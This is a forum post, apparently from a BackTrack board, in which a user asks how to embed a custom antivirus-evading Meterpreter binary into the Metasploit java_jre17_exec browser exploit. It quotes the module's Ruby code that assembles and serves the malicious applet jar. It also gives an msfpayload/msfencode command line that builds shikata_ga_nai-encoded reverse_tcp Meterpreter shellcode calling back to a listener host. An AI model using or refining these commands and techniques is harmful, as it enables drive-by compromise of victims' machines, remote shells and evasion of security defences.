java_jre17_exec custom applet

Hello BT!

I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.

Here's the exploit:

Code:

---

/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb

---

The interesting lines are:

Code:

---

p = regenerate_payload(cli)
                jar  = p.encoded_jar
                paths.each do |path|
                        1.upto(path.length - 1) do |idx|
                                full = path[0,idx].join("/") + "/"
                                if !(jar.entries.map{|e|e.name}.include?(full))
                                        jar.add_file(full, '')
                                end
                        end
                        fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
                        data = fd.read(fd.stat.size)
                        jar.add_file(path.join("/"), data)
                        fd.close
                        #jar.each do |num|  --------- tried to see what does the jar array contain, but it doesen't show up in the console. am i doing it wrong?
                              #puts num
                        #end
                end

                print_status("Sending Applet.jar")
                send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

                handler( cli )
        end

---

I think "jar.pack" is the final result.

So I have two options:
1)Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2)Create my own jar and replace it with "jar.pack".

Do you have some ideas?

Thanks.

So I've heard about generic/custom and thought it would be a nice ideea to use it with java_jre17_exec:

I've generated my shellcode:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.132.128 LPORT=1234 R | msfencode -a x86 -c 1 -e x86/shikata_ga_nai -t c | tr -d '"' | tr -d '\n' > /root/meter.shell
use exploit/multi/browser/java_jre17_exec
set PAYLOAD generic/custom
set PAYLOADFILE /root/meter.shell
exploit
[-] Exploit failed: Could not locate a compatible payload for Java/["java"]

Why?

Another question:
I'm using PyWin to create a FUD meterpreter binary.
1)How could I generate shellcode from my binary so that I could use it with generic/custom along with java_jre17_exec? //later, found a perl script which does it.
2)Will I get an established connection in the java_jre17_exec exploiting session if I use my custom binary? Or I should open another session using multi/handler?

Thank you.